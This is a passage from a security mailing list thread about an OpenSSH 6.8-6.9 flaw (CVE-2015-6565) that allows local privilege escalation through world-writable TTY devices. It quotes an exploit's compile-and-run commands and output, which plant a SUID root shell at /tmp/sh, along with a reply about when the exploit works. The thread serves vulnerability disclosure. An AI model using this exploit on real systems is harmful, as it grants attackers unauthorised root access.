Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 26 Jan 2017 21:52:43 +0100
From: up201407890@...nos.dcc.fc.up.pt
To: oss-security@...ts.openwall.com, Noryungi <noryungi@...il.com>
Subject: Re: Re: OpenSSH: CVE-2015-6565 (pty issue in
	6.8-6.9) can lead to local privesc on Linux

Quoting Noryungi <noryungi@...il.com>:

The PTY slave must be root owned to get root obviously, for example  
when root logs in via ssh.

> Does not work on centos 7.1 (unpatched) running stock openssh.
>
> TTY capture works, /tmp/sh is created but user is unprivileged.
>
> On Jan 26, 2017 5:52 PM, <up201407890@...nos.dcc.fc.up.pt> wrote:
>
>> Hi list,
>>
>> I know I'm late to the party, but I was bored, so I decided to write an
>> exploit for CVE-2015-6565 which affects OpenSSH 6.8-6.9
>> It is mostly considered to be a "DoS", even though Jann Horn publicly told
>> how it could be exploited for local privilege escalation, but I guess its
>> either PoC||GTFO for users to update.
>>
>> From https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565
>>
>> "sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY
>> devices, which allows local users to cause a denial of service (terminal
>> disruption) or possibly have unspecified other impact by writing to a
>> device, as demonstrated by writing an escape sequence."
>>
>> I think the description should be updated.
>>
>> $ gcc not_an_sshnuke.c -o not_an_sshnuke
>> $ ./not_an_sshnuke /dev/pts/3
>> [*] Waiting for slave device /dev/pts/3
>> [+] Got PTY slave /dev/pts/3
>> [+] Making PTY slave the controlling terminal
>> [+] SUID shell at /tmp/sh
>> $ /tmp/sh --norc --noprofile -p
>> # id
>> euid=0(root) groups=0(root)
>>
>> Thanks,
>> Federico Bento.
>>
>>
>>
>> ----------------------------------------------------------------
>> This message was sent using IMP, the Internet Messaging Program.
>>
>



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ